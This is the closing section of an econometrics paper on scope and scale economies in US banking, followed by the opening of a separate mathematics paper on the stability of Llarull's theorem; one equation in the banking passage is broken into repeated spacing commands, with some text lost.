biased and need not have the same magnitude or even sign as the true quantity unless \(\exp\{\epsilon\}\) is mean-independent of \(\mathbf{v}\) which is unlikely to be true in practice, say, if \(\epsilon\) is heteroskedastic. In the case of quantile estimation, we however do _not_ face such a problem owing to the equivariance of quantiles to monotone transformations, viz. \(\mathcal{Q}_{C}[\tau|\mathbf{v}]=\mathcal{Q}_{\exp\{c\}}[\tau|\mathbf{v}]=\exp\{ \mathcal{Q}_{c}[\tau|\mathbf{v}]\}\) (e.g., see Koenker, 2005). Now, recall that \(\mathcal{S}_{t}(\tau)\) depends on the choice of \(\{\bar{\omega}_{m}^{\kappa}\}\), which we circumvent by choosing weights that yield the smallest cost subadditivity measure for a given cost quantile \(\tau\) in the admissible region: \(\mathcal{S}_{t}^{*}(\tau)\). Namely, for each fixed cost quantile of interest, we perform a grid search over a permissible range of weights in \([0,1]^{6}\) at the \(0.1\) increments. We do this for each bank in a given year. Table 2 summarizes such point estimates of \(\mathcal{S}_{t}^{*}(\tau)\) for different quantiles of the conditional cost distribution. (We caution readers against confusing quantiles of the conditional cost distribution \(\tau\), for which our bank cost function and the cost subadditivity measure are estimated, with the quantiles of empirical distribution of observation-specific \(\mathcal{S}_{t}^{*}(\tau)\) estimates corresponding to a given \(\tau\).) The two hypotheses of particular interest here are \((i)\)\(\mathbb{H}_{0}:\mathcal{S}_{t}^{*}(\tau)\leq 0\) v. \(\mathbb{H}_{1}:\mathcal{S}_{t}^{*}(\tau)>0\) and \((ii)\)\(\mathbb{H}_{0}:\) \(\mathcal{S}_{t}^{*}(\tau)=0\) v. \(\mathbb{H}_{1}:\mathcal{S}_{t}^{*}(\tau)\neq 0\). Both tests are essentially the same, except for the one- or two-sided alternatives. Although the \((i,t)\) index on outputs is suppressed in (5.1), the tests are at the level of observation (bank-year). In case of \((i)\), rejection of the null would imply that even the smallest subadditivity measure is statistically _positive_ and scope economies can thus be inferred to also be locally significant over the bank's output space in a given year. In case of \((ii)\), failure to reject the null would suggest that subadditivity measure is statistically indistinguishable from zero, which is consistent with the bank's cost structure exhibiting local scope invariance. The right panel of Table 2 reports the results of these hypothesis tests. Namely, for each cost quantile \(\tau\), we classify banks in our data based on the two dichotomous groups of categories: banks that exhibit scope economies \([\mathcal{S}_{t}^{*}(\tau)>0]\) vs. scope non-economies \([\mathcal{S}_{t}^{*}(\tau)\leq 0]\) and the banks whose cost structure that exhibits scope invariance \([\mathcal{S}_{t}^{*}(\tau)=0]\) vs. scope non-invariance \([\mathcal{S}_{t}^{*}(\tau)\neq 0]\). Our results provide strong evidence in support of statistically significant scope economies across banks virtually of all sizes in the U.S. banking sector. For banks in the middle interquartile range of the cost--essentially, size--distribution, at least 95.7% exhibit positive economies of scope. For the top half of the distribution (median or higher), the prevalence of significant scope economies is about 99%. Even at the very bottom of cost distribution (\(\tau=0.1\)) where the revenue diversification opportunities may not be as abundant or easily accessible, our test results suggest that roughly 92% of banks enjoy scope-driven cost savings and those, who do not, exhibit scope invariance. Figure 3 provides a graphic illustration of these results. For each considered cost quantile \(\tau\), the figure shows a scatter-plot of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates for each bank-year observation along with the corresponding one-sided 95% lower confidence bound. Here, we sort these estimates by their lower confidence bounds (solid line) and color them based on whether they are significantly above 0 or not. From Figure 3, it is evident that positive scope economies are ubiquitous and that their presence is only growing with quantiles of the conditional variable-cost distribution of banks (i.e., with the bank size). \begin{table} \begin{tabular}{l c c c c|c c c|c c} \hline \hline Cost & \multicolumn{4}{c|}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories_} \\ Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. & \(=\mathbf{0}\) & \(\neq\mathbf{0}\) & \(>\mathbf{0}\) & \(\leq 0\) \\ \hline \(\mathcal{Q}(0.10)\) & 0.138 & 0.078 & 0.125 & 0.181 & **9.76\%** & 90.24\% & **92.04\%** & 7.96\% \\ & (0.058, 0.469) & (0.023, 0.288) & (0.048, 0.463) & (0.082, 0.626) & & & & \\ \(\mathcal{Q}(0.25)\) & 0.175 & 0.107 & 0.163 & 0.225 & **5.48\%** & 94.52\% & **95.70\%** & 4.30\% \\ & (0.078, 0.598) & (0.036, 0.361) & (0.067, 0.579) & (0.106, 0.777) & & & & \\ \(\mathcal{Q}(0.50)\) & 0.264 & 0.175 & 0.258 & 0.335 & **1.40\%** & 98.60\% & **98.90\%** & 1.10\% \\ & (0.120, 0.937) & (0.066, 0.549) & (0.109, 0.873) & (0.155, 1.185) & & & & \\ \(\mathcal{Q}(0.75)\) & 0.388 & 0.259 & 0.394 & 0.496 & **0.45\%** & 99.55\% & **99.50\%** & 0.50\% \\ & (0.194, 1.205) & (0.103, 0.683) & (0.169, 1.113) & (0.242, 1.582) & & & & \\ \(\mathcal{Q}(0.90)\) & 0.459 & 0.313 & 0.476 & 0.575 & **0.30\%** & 99.70\% & **99.60\%** & 0.40\% \\ & (0.261, 1.164) & (0.121, 0.671) & (0.231, 1.036) & (0.356, 1.567) & & & & \\ \hline \hline \end{tabular} The left panel summarizes point estimates of \(\mathcal{S}_{t}^{*}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting scope economies \([\mathcal{S}_{t}^{*}(\tau)>0]\) vs. non-economies \([\mathcal{S}_{t}^{*}(\tau)\leq 0]\) and scope invariance \([\mathcal{S}_{t}^{*}(\tau)=0]\) vs. scope non-invariance \([\mathcal{S}_{t}^{*}(\tau)\neq 0]\) using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negating alternative. Percentage points sum up to a hundred within binary groups only. \end{table} Table 2: Cost Subadditivity Estimates Figure 3: The One-Sided 95% Lower Bounds (solid lines) of the Cost Subadditivity Point Estimates (scatter points) Across Cost Quantiles As a robustness check, we re-estimate our model under alternative empirical specifications of the cost-function variables. Namely, we consider a different proxy for nontraditional operations used in the literature (net non-interest income) as well as assess sensitivity of our findings to credit risk proxies included in the analysis. Table 3 summarizes estimates of cost subadditivity across these alternatives. Two observations are in order here. First, omitting an _ex-ante_ proxy for output quality (loan loss provisions) produces uniformly larger point estimates of cost subadditivity. Consequently, the evidence in favor of significantly positive scope economies is even stronger in the latter case. Nonetheless, we continue to include this important control in our main specification. Second, when using net non-interest income as a proxy measure of nontraditional banking operations, we obtain smaller \(\mathcal{S}_{t}^{*}(\tau)\) estimates, with the largest differences seen at the bottom tail of costs. But even then, the empirical evidence in support of scope economies across banks is strong. For banks in the middle of the cost distribution (at the conditional median), 89% exhibit significant economies of scope. The prevalence of product-scope-driven cost savings is even more pervasive (\(\geq 97.6\%\)) for larger banks at higher quantiles. In the case of smaller-scale banks at the bottom 0.10th and 0.25th quantiles, the share of banks that enjoy scope economies--while smaller--is nonetheless non-negligible, ranging between 41-65% and 59-82%, respectively, depending on the credit risk proxies included in the analysis. The cost structure of the remaining banks is scope-invariant. All in all, our findings of significant scope economies in banking are robust to alternative specifications, and in what follows, we therefore focus on the results from our main specification only. A finding worth emphasizing here is that, having accounted for three-way heterogeneity across banks in a pursuit of robust estimates of bank cost subadditivity, we find _no_ empirical evidence in support of scope _dis_seconding. This is in stark contrast with earlier studies of scope economies in U.S. banking (e.g., Berger et al., 1987; Mester, 1987; Hughes and Mester, 1993; Pulley and Braunstein, 1992; Ferrier et al., 1993; Pulley and Humphrey, 1993; Jagtiani et al., 1995; Jagtiani and Khanthavit, 1996; Wheelock and Wilson, 2001). Besides our reliance on the more robust estimation methodology, the qualitative differences between our and prior findings can also be attributed to fundamental changes that the banking sector has undergone in the past two decades characterized by the growing importance of nontraditional banking operations propelled by the financial product innovations. Although, the subadditivity measure does not directly quantify the _magnitude_ of scope economies in the conventional interpretation of the latter, the value of its point estimates can still provide useful insights into the diversification-driven cost savings. Recall that \(\mathcal{S}_{t}^{*}(\tau)\) compares the cumulative cost of multiple smaller banks of higher degrees of _relative_ output specialization with the cost of a larger, more relatively diversified bank. Essentially, the subadditivity measure sheds light on scope economies from a perspective of relative--as opposed to absolute--notion of revenue diversification. Measured is the reduction in bank cost (in proportions) afforded by achieving lower specialization in any one output. From the left panel of Table 2, the mean estimates of cost subadditivity ranges from 0.138 to 0.459 depending on the conditional cost quantile. This suggests, on average, the potential for a 14-46% cost saving if the bank "rebalances" its joint production of loans, securities and off-balance sheet outputs. We also find that the magnitude of diversification-driven economies increases as one moves from the bottom to top Figure 4: Kernel Densities of Cost Subadditivity Estimates Across Cost Quantiles of the bank cost distribution, thereby suggesting that larger banks (higher \(\tau\)) may economize cost better compared to those of smaller size in the lower end of the cost distribution. For a more holistic look at the empirical evidence of scope economies across different quantiles of the bank cost distribution, we also provide kernel density plots of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates in Figure 4. It enables us to compare distributions of the cost subadditivity estimates as opposed to merely focusing on marginal moments. Consistent with our earlier discussion, these plots indicate that large-scale banks lying in the upper quantiles of the cost distribution appear to enjoy bigger diversification-driven cost economies than those in the lower cost quantiles. To support this visual evidence, we formally test for the (first-order) stochastic dominance of scope economies exhibited by banks in the top cost quantiles over those exhibited by those in the bottom quantiles. We utilize a generalized Kolmogorov-Smirnov test proposed by Linton et al. (2005) which permits testing dominance over multiple variables (in our case, more than two cost quantiles) and allows these variables to be estimated latent quantities as opposed to observables from the data and to also share dependence (in our case, the dependence is due to common parameter estimates used to construct quantile coefficients). Specifically, let \(F_{\tau}(\mathcal{S})\) represent the cumulative distribution functions of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates for a given cost quantile \(\tau\). We then form the null hypotheses that diversification-driven scope economies exhibited by banks in the lower quantiles of the cost distribution are stochastically dominated by those in the upper quantiles of the cost distribution. More formally, for any cost quantile of interest \(\overline{\tau}\in\mathbb{T}\) with \(\mathbb{T}=\{0.10,0.25,0.50,0.75,0.90\}\), we are interested in \[\mathbb{H}_{0}\colon\min_{\tau\neq\mathbb{F}\in\mathbb{T}}\sup_{\mathcal{S}\in \mathbb{S}}\left[F_{\tau}(\mathcal{S})-F_{\overline{\tau}}(\mathcal{S}) \right]\leq 0\ \text{ v. }\mathbb{H}_{1}:\min_{\tau\neq\mathbb{F}\in\mathbb{T}}\sup_{\mathcal{S}\in \mathbb{S}}\left[F_{\tau}(\mathcal{S})-F_{\overline{\tau}}(\mathcal{S}) \right]>0.\] We use the sub-sampling procedure suggested by Linton et al. (2005) to perform the test.7 Footnote 7: We employ 199 equidistant sub-sample sizes \(B_{n}=\{b_{1},\ldots,b_{199}\}\), where \(b_{1}=[\log\log N]\), \(b_{199}=[N/\log\log N]\) with \(N=nT\) being the sample size. For each sub-sample size, we get a \(p\)-value. The reported is the mean of these 199 \(p\)-values. Table 4 reports \(p\)-values for the tests of dominance of \(\mathcal{S}_{t}^{*}(\tau)\) from the "row" quantile over a multi-quantile set of \(\mathcal{S}_{t}^{*}(\tau)\) from the "column" quantiles. All \(p\)-values are safely greater than the conventional 0.05 level, and we fail to reject the nulls. Combined with the visual evidence from Figure 4, we can therefore infer that bigger banks in the higher quantiles of the cost distribution exhibit larger scope economies than do smaller banks from the lower cost quantiles for the entire set of observable output mixes. Relatedly, of interest is the relation between the scope economies magnitude and the degree of bank's specialization in nontraditional products. To examine this, for each cost quantile \(\tau\) that we \begin{table} \begin{tabular}{l c c c c} \hline \hline & \(\{\mathcal{Z}(0.75),\ldots,\mathcal{Z}(0.10)\}\) & \(\{\mathcal{Z}(0.50),\mathcal{Z}(0.25),\mathcal{Z}(0.10)\}\) & \(\{\mathcal{Z}(0.25),\mathcal{Z}(0.10)\}\) & \(\mathcal{Z}(0.10)\) \\ \hline \(\mathcal{Z}(90)\) & 0.578 & 0.578 & 0.739 & 0.970 \\ \(\mathcal{Z}(75)\) & & 0.894 & 0.970 & 0.970 \\ \(\mathcal{Z}(50)\) & & & 0.970 & 0.970 \\ \(\mathcal{Z}(25)\) & & & & 0.784 \\ \hline \hline \multicolumn{4}{l}{Reported are the \(p\)-values.} \\ \hline \hline \end{tabular} \end{table} Table 4: Stochastic Dominance of Scope Subadditivity Across Cost Quantiles consider in our analysis, we run a least-absolute-deviation regression of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates on the share of off-balance sheet activities in bank's total output \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\). Their median _associations_ are all significant and monotonically increasing with cost quantile: \(-0.31\), \(-0.29\), \(-0.09\), \(0.35\) and \(0.41\) for \(\tau=0.10,0.25,0.50,0.75,0.90\), respectively. This suggest that, among larger banks (higher \(\tau\)) those who engage in off-balance sheet banking more heavily tend to enjoy scope economies of greater degrees. In contrast, for smaller banks (lower \(\tau\)), pivoting off balance sheet is associated with reduced scope-driven cost savings, plausibly because of their limited capabilities to capitalize on cross-output spillovers and input complementarities at smaller operations scales. Lastly, we take a look at the evolution of scope economies. Figure 5 documents how distributions of the cost subadditivity estimates shifted over time. Plotted are the box-plots of \(\mathcal{S}_{t}^{*}(\tau)\) across five considered cost quantiles \(\tau\) for each year \(t\). The data suggest a divergence in the degree of cost subadditivity between smaller (lower cost quantiles) and larger (higher cost quantiles) banks over time which, however, started reverting in the last years of the sample. We further observe that, while positive and significant throughout, the magnitude of a cost-saving potential associated with the product-scope diversification picked around 2013-2014 and has since been in a steady decline, across all cost quantiles. Figure 5: Evolution of Cost Subadditivity ### Scale Economies We complement our analysis of the scope-driven cost savings in the U.S. banking with the examination of economies of scale. Scale economies are said to exist if the banks' average cost declines with equiproportional expansion of its outputs (i.e., with the increase in scale of production). As discussed in the introduction, the latter has been a subject of particular academic interest in face of the post-crisis regulatory reforms in the banking sector. Our returns to scale measure takes into account quasi-ficity of the equity input per Caves et al. (1981): \[\mathcal{R}_{t}(\tau)=\big{(}1-\partial\mathcal{Q}_{c}(\tau|\cdot)/\partial k _{1}\big{)}\Big{/}\sum_{m}\partial\mathcal{Q}_{c}(\tau|\cdot)/\partial y_{m}, \tag{5.2}\] where we replaced the usual \(\log\mathcal{C}_{t}(\cdot)\) with the quantile function of the log-cost \(\mathcal{Q}_{c}(\tau|\cdot)\) in the formula since our cost function estimation is for a conditional quantile. The measure of returns to scale is therefore both observation- and cost-quantile-specific. Just like in the case of scope economies, for a given \(\tau\), we are mainly interested in the following two hypotheses: (_i_) \(\mathbb{H}_{0}:\mathcal{R}_{t}(\tau)\leq 1\) v. \(\mathbb{H}_{1}:\mathcal{R}_{t}(\tau)>1\) and (_ii_) \(\mathbb{H}_{0}:\mathcal{R}_{t}(\tau)=1\) v. \(\mathbb{H}_{1}:\mathcal{R}_{t}(\tau)\neq 1\). In case of (_i_), rejection of the null would imply that the returns to scale statistically _exceed_\(1\) implying increasing returns (IRS) and, thus, significant scale economies. In case of (_ii_), failure to reject the null would suggest that returns to scale are statistically indistinguishable from \(1\), which is consistent with the bank exhibiting constant returns to scale (CRS) and, hence, scale invariance of costs. Table 5 summarizes point estimates of the returns to scale for all estimated quantiles of the conditional cost distribution of banks. The right panel of the table reports the results of the hypothesis tests. Namely, reported is the breakdown of banks that exhibit IRS (scale economies) vs. non-IRS (scale non-economies) and of banks that exhibit CRS (scale invariance) vs. non-CRS (scale non-invariance). The results in Table 5 provide overwhelming evidence of ubiquitous scale economies in the banking sector, across all cost quantiles. The average point estimates of returns to scale ranges from \(1.30\) to \(1.43\) \begin{table} \begin{tabular}{l r r r r|r r r} \hline \hline Cost & \multicolumn{4}{c}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories, \%_} \\ Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. & \(=1\) & \(\neq 1\) & \(\approx 1\) & \(\leq 1\) \\ \hline \(\mathcal{Q}(0.10)\) & 1.300 & 1.263 & 1.293 & 1.328 & **0.02** & 99.98 & **99.99** & 0.01 \\ & (1.263, 1.352) & (1.226, 1.316) & (1.257, 1.344) & (1.286, 1.382) & & & \\ \(\mathcal{Q}(0.25)\) & 1.321 & 1.282 & 1.313 & 1.351 & **0.01** & 99.99 & **100.0** & 0.00 \\ & (1.282, 1.363) & (1.243, 1.322) & (1.276, 1.354) & (1.306, 1.399) & & & \\ \(\mathcal{Q}(0.50)\) & 1.361 & 1.316 & 1.351 & 1.394 & **0.01** & 99.99 & **100.0** & 0.00 \\ & (1.319, 1.404) & (1.276, 1.356) & (1.31, 1.393) & (1.347, 1.444) & & & \\ \(\mathcal{Q}(0.75)\) & 1.405 & 1.352 & 1.392 & 1.441 & **0.00** & 100.0 & **100.0** & 0.00 \\ & (1.352, 1.457) & (1.307, 1.398) & (1.344, 1.443) & (1.385, 1.500) & & & \\ \(\mathcal{Q}(0.90)\) & 1.430 & 1.373 & 1.416 & 1.469 & **0.01** & 99.99 & **100.0** & 0.00 \\ & (1.363, 1.491) & (1.314, 1.421) & (1.353, 1.469) & (1.397, 1.533) & & & \\ \hline \hline \end{tabular} * The left panel summarizes point estimates of \(\mathcal{R}_{t}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting IRS \(|\mathcal{R}_{t}(\tau)>1|\) vs. non-IRS \(|\mathcal{R}_{t}(\tau)\leq 1|\) and CRS \(|\mathcal{R}_{t}(\tau)=1|\) vs. non-CRS \(|\mathcal{R}_{t}(\tau)\neq 1|\) using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negative alternative. Percentage points sum up to a hundred within binary groups only. \end{table} Table 5: Returns to Scale Estimates with banks from the higher quantiles of cost distribution exhibiting increasing returns to scale of larger magnitudes compared to those from the lower quantiles. We find that almost every single bank in our sample exhibits statistically significant scale economies (IRS). These results suggest that, when the bank radially expands the scale of its operation, its average variable cost decreases. These findings are consistent with the prior results which however are almost exclusively based on the analyses of bank costs at the conditional _mean_(e.g., Wheelock and Wilson, 2012; Hughes and Mester, 2013; Restrepo-Tobon and Kumbhakar, 2015; Malikov et al., 2015; Restrepo-Tobon et al., 2015; Wheelock and Wilson, 2018). Given that we find evidence of significant scale economies along the entire cost _distribution_, our results provide the robust assurance to these earlier findings reported in the literature. ### Technological Change We conclude our analysis of bank cost structure by examining temporal shifts in the bank cost frontier in face of technological advancements as well as regulatory changes in the industry in aftermath of the 2008 financial crisis. A cost-diminishing technological change can provide another means for cost savings. Because we model temporal variation in the cost relationship using discretized time indices, we replace the standard continuous measure of technical change with a discrete dual measure of technological change at each cost quantile \(\tau\). Namely, from (3.3), we have \[-\mathcal{FC}_{t}(\tau) \equiv\mathcal{Q}_{c}(\tau|\cdot,t)-\mathcal{Q}_{c}(\tau|\cdot,t-1)\] \[=\Delta L(t)+\Delta S(t)q_{\tau}+\] \[\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad \quad cal change is statistically positive for modest 37% of banks. Evidence of significant cost diminution is even weaker among banks in the bottom half of the cost distribution. Overall, our results suggest that the cost-saving effects of many recent technological advancements in the banking industry, such as the growing networks of automated teller machines, growing credit card networks, electronic payments, internet banking, etc., that were found in the pre-crisis period by earlier studies (e.g., Wheelock and Wilson, 1999; Almanidis, 2013; Malikov et al., 2015) have now largely waned, plausibly because most banks had already capitalized on them to the fullest extent feasible and/or because they now face new regulatory controls. A significant technical change among larger banks in the upper tail of the cost distribution is likely due to their better capability to adapt and innovate. ## 6 Conclusion Propelled by the recent financial product innovations, banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in a pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, and the portfolio of products offered by present-day banks is very different from that two decades ago. This underscore the importance of taking a fresh look at scope economies in banks because leveraging operational scope continues to play a vital role in operations management in banking. It is also important from a policy evaluation perspective, in the face of new financial regulations such as the Dodd-Frank Wall Street Reform and the Consumer Protection \begin{table} \begin{tabular}{l c c c c|c c c c} \hline \hline Cost & \multicolumn{4}{c|}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories, \%_} \\ Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. & \(=\mathbf{0}\) & \(\neq\mathbf{0}\) & \(>\mathbf{0}\) & \(\leq\mathbf{0}\) \\ \hline \(\mathcal{Q}(0.10)\) & –0.010 & –0.026 & –0.008 & 0.006 & **63.06** & 36.94 & **9.69** & 90.31 \\ & (–0.022, 0.004) & (–0.039, –0.010) & (–0.020, 0.006) & (–0.007, 0.021) & & & & \\ \(\mathcal{Q}(0.25)\) & –0.005 & –0.019 & –0.003 & 0.011 & **61.23** & 38.77 & **17.52** & 82.48 \\ & (–0.015, 0.007) & (–0.031, –0.007) & (–0.013, 0.009) & (0.000, 0.025) & & & & \\ \(\mathcal{Q}(0.50)\) & 0.005 & –0.008 & 0.007 & 0.021 & **53.71** & 46.29 & **36.91** & 63.09 \\ & (–0.004, 0.015) & (–0.018, 0.001) & (–0.002, 0.018) & (0.011, 0.037) & & & & \\ \(\mathcal{Q}(0.75)\) & 0.015 & 0.002 & 0.017 & 0.031 & **47.22** & 52.78 & **54.33** & 45.67 \\ & (0.006, 0.026) & (–0.008, 0.013) & (0.008, 0.030) & (0.019, 0.049) & & & & \\ \(\mathcal{Q}(0.90)\) & 0.021 & 0.007 & 0.022 & 0.037 & **42.91** & 57.09 & **61.50** & 38.50 \\ & (0.008, 0.032) & (–0.005, 0.019) & (0.010, 0.035) & (0.022, 0.056) & & & & \\ \hline \hline \end{tabular} * The left panel summarizes point estimates of \(TC_{t}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting technical progress \(\left\lceil TC_{t}(\tau)>0\right\rceil\) vs. non-progress \(\left\lceil TC_{t}(\tau)\leq 0\right\rceil\) and technical stasis \(\left\lceil TC_{t}(\tau)=0\right\rceil\) vs. non-stasis \(\left\lceil TC_{t}(\tau)\neq 0\right\rceil\) using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negative alternative. Percentage points sum up to a hundred within binary groups only. \end{table} Table 6: Technical Change Estimates Act of 2010 that seek to set restrictions on the scale and scope of bank operations. This paper provides new evidence about scope economies in U.S. commercial banking during the 2009-2018 post-crisis period. We improve upon the prior literature not only by analyzing the most recent and relevant data and accounting for bank's nontraditional off-balance sheet operations, but also in multiple methodological ways as follows. In a pursuit of robust estimates of scope economies and statistical inference thereon, we estimate a flexible, yet parsimonious, time-varying-coefficient panel-data quantile regression model which accommodates three-way bank heterogeneity: (_i_) distributional heterogeneity in the cost structure of banks along the size of their costs, (_ii_) temporal variation in cost complementarities and spillovers due to technological change/innovation, and (_iii_) unobserved bank confounders such as latent management quality. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies.
2310.14412
Stability of Llarull's theorem in all dimensions
Llarull's theorem characterizes the round sphere $S^n$ among all spin manifolds whose scalar curvature is bounded from below by $n(n-1)$. In this paper we show that if the scalar curvature is bounded from below by $n(n-1)-\varepsilon$, the underlying manifold is $C^0$-close to a finite number of spheres outside a small bad set. This completely solves Gromov's spherical stability problem.
Sven Hirsch, Yiyue Zhang
2023-10-22T20:53:54Z
http://arxiv.org/abs/2310.14412v3
# Stability of Llarull's theorem in all dimensions ###### Abstract. We prove stability of Llarull's theorem in all dimensions using spin geometry. Our results are stated in terms of both intrinsic flat convergence and \(C^{0}\) convergence outside a small set. ## 1. Introduction Recently, there has been much interest in analyzing the stability of various scalar curvature geometry results. Roughly speaking, these can be divided into two categories: on the one hand, there are results based on the level-set method such as [1, 2, 13, 14, 22]. On the other hand, there are results exploiting the structure of various special settings such as graphs [9, 21] and spherical symmetry [6, 23]. One particular question is M. Gromov's _spherical stability problem_[17, page 20] concerning the stability of Llarull's theorem [24]. We refer to C. Sormani's survey [26] for a detailed overview of relevant results and conjectures. In this article, we introduce another method to analyze stability: using spin geometry, we confirm M. Gromov's conjecture in all dimensions for manifolds with a uniform Poincare constant bound. **Theorem A**.: _Let \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_ 1. _the scalar curvatures of_ \(g_{i}\) _satisfy_ \(R_{g_{i}}\geq n(n-1)-\frac{1}{4}\)_,_ 2. \(g_{i}\geq g_{0}\)_, where_ \(g_{0}\) _is the round metric on_ \(S^{n}\)_,_ 3. _the Poincare constants of_ \((S^{n},g_{i})\) _are uniformly bounded from above,_ 4. _the diameters of_ \((S^{n},g_{i})\) _are uniformly bounded from above._ _Then \((S^{n},g_{i})\) converges to \((S^{n},g_{0})\) in the intrinsic flat sense._ We remark that the Poincare constant bound is necessary as demonstrated by P. Sweeney in [28]. However, this assumption is relatively mild and does allow for certain _bags of gold_ or _bubbles_, cf. Figure 1 below. Strengthening the Poincare constant bound to a Cheeger constant bound and assuming an additional volume upper bound, this has already been established in dimension 3 by B. Allen, E. Bryden and D. Kazaras in the important work [2]. In their setting, they are able to replace assumption (1) with an \(L^{2}\) lower bound for the scalar curvature. Their proof relies on the integral formula for spacetime harmonic functions [19] due to D. Kazaras, M. Khuri and the authors which originates from the proof of the spacetime positive mass theorem [18, 20]. We on the other hand use the integral formula for spinors based on Llarull's original paper [24], also see the work of S. Goette and U. Semmelmann [15]. We are also able to impose an integral lower bound on the scalar curvature by replacing the Poincare constant bound with a Sobolev constant bound. **Theorem B**.: _Let \(\alpha\in[n,\infty]\), and let \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_ 1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{4}|S^{n} |^{\frac{\alpha}{2}}_{g_{i}}\)_, where_ \(x_{-}=\max\{-x,0\}\)_,_ 2. \(g_{i}\geq g_{0}\)_,_ 3. _the normalized Sobolev constants_1__\(C^{*}_{S_{\alpha}}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above,_ Footnote 1: See Definition 2.4 and Remark 2.6. 4. _the diameters of_ \((S^{n},g_{i})\) _are uniformly bounded from above._ _Then \((S^{n},g_{i})\) converges to \((S^{n},g_{0})\) in the intrinsic flat sense._ We remark that Theorem B implies Theorem A for \(\alpha=\infty\). Many scalar curvature stability results are phrased in terms of intrinsic flat convergence. This notion of convergence has been introduced by C. Sormani and S. Wenger [27] and builds upon the theory of currents in metric spaces developed by L. Ambrosio and B. Kirchheim [4]. The popularity of intrinsic flat convergence stems from its ability to control _splines_ or _trees_ which can appear in the limiting process as shown in Figure 1. These splines make it impossible to expect \(C^{0}\) or even Gromov-Hausdorff convergence on the entire manifold. To achieve a stronger notion of convergence, one can remove the bad region containing the splines. This alternative approach, introduced by C. Dong in [13], led to a resolution of the Huisken-Ilmanen conjecture by C. Dong and A. Song in [14]. They excised a small set (measured by the area of its boundary) and showed that the remainder converges in the Gromov-Hausdorff sense. Using spinors in the context of Llarull's theorem, we are even able to obtain \(C^{0}\) convergence outside a small set (measured by its volume). Moreover, we can relax the assumption \(g_{i}\geq g_{0}\) to merely hold on two-forms2 which is in the spirit of Llarull's original work. Footnote 2: Here we say \(g\geq g_{0}\) on two-forms if \(|w|_{g}\geq|w|_{g_{0}}\) for all \(w\in\Omega^{2}(S^{n})\). **Theorem C**.: _Let \(\alpha\in[n,\infty]\), and \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_ 1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{4}|S^{n} |_{g_{i}}^{\frac{2}{2}}\)_,_ 2. \(g_{i}\geq g_{0}\) _on two-forms,_ 3. _the normalized Sobolev constants_ \(C^{*}_{S_{\alpha}}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above._ _Then for every \(\varepsilon>0\) there 